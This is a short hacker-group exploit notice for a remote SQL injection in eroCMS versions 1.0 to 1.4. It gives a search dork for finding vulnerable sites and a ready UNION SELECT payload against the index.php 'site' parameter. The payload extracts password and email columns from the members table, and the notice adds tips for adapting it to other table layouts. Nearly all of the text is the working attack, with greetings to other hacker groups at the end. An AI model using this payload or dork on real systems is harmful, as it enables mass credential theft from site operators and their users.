Remote SQL Injection in eroCMS V1.0 - V1.4
#################### Viva IslaM Viva IslaM ##############################
## Remote SQL Injection Vulnerability
## eroCMS V1.0 - V1.1 - V1.2 - V1.3 - V1.4 ( index.php site )
## AuTh0r : Mr.SQL
## H0ME : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
## !! SYRIAN HaCkErS !!
## Script : eroCMS
## Vesrion : 1.0 - 1.1 - 1.2 - 1.3 - 1.4
## site :
## D0rk : "by eroCMS"
## -(:: SQL ::)-
## index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/*
## -(:: L!VE DEMO ::)-
-(:: NOTE ::)-
maybe table users ( members )
columns ( , passwort , email , ) get the user column , USE group by :) , (( This porno script ))
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
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